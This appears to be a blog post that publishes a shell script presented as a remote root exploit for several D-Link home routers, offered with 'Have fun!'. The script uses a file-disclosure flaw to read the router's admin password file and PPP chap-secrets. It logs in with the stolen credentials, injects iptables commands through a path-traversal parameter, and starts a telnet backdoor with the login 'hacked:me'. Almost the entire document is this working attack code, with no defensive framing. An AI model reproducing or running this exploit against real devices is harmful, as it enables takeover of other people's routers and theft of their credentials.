D-Link DIR-300, DIR-600, DIR-615 (fw 4.0) remote root exploit

This is a remote root exploit for D-Link wireless routers DIR-300 (all versions), DIR-600 (all versions), DIR-615 (fw 4.0).

Have fun!

#!/bin/sh

if [ -z "$1" ]; then
echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)";
echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b";
echo "usage: $0 [router address] [telnet port]";
exit 0;
fi;

if [ -z "$2" ]; then
TPORT=3333;
else
TPORT=$2;
fi

UPORT=31337;

echo "Trying $1 ...";

HTTPASSWD=`curl -sS "<a href="http://%241/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd%22" rel="nofollow">http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd"</a>; | grep -A1 "&lt;center&gt;" | tail -1 |
sed -e "s/\t//g ; s/^\([^:]*\):\([^:]*\)$/\1\n \2/g"`;

if [ ! -z "$HTTPASSWD" ]; then
L=`echo $HTTPASSWD | cut -d' ' -f1`;
P=`echo $HTTPASSWD | cut -d' ' -f2`;

echo "found username: $L";
echo "found password: $P";

curl -d "ACTION_POST=LOGIN&amp;LOGIN_USER=$L&amp;LOGIN_PASSWD=$P" -sS "<a href="http://%241/login.php%22" rel="nofollow">http://$1/login.php"</a>; | grep -v "fail"
1&gt;/dev/null;

if [ $? -eq 0 ]; then
curl -sS
"<a href="http://%241/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/iptables" rel="nofollow">http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/iptables</a> -t nat -A PRE_MISC -i
eth0.2 -p tcp --dport $TPORT -j ACCEPT&amp;set/runtime/syslog/sendmail=1" 1&gt;/dev/null;
curl -sS
"<a href="http://%241/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/iptables" rel="nofollow">http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/iptables</a> -t nat -A PRE_MISC -i
eth0.2 -p tcp --dport $UPORT -j ACCEPT&amp;set/runtime/syslog/sendmail=1" 1&gt;/dev/null;
curl -sS
"<a href="http://%241/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/telnetd" rel="nofollow">http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/telnetd</a> -p $TPORT -l
/usr/sbin/login -u hacked:me&amp;set/runtime/syslog/sendmail=1" 1&gt;/dev/null;

echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..."
curl -sS "<a href="http://%241/logout.php%22" rel="nofollow">http://$1/logout.php"</a>; 1&gt;/dev/null;
fi
fi

CHAP=`curl -sS "<a href="http://%241/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets%22" rel="nofollow">http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets"</a>; | grep -A1 "&lt;center&gt;" | sed -e
"s/&lt;center&gt;//g"`;

if [ ! -z "$CHAP" ]; then
echo "found chap-secrets: $CHAP";
fi

echo "Bye bye.";

exit 0;

Leave a Reply

Your email address will not be published. Required fields are marked *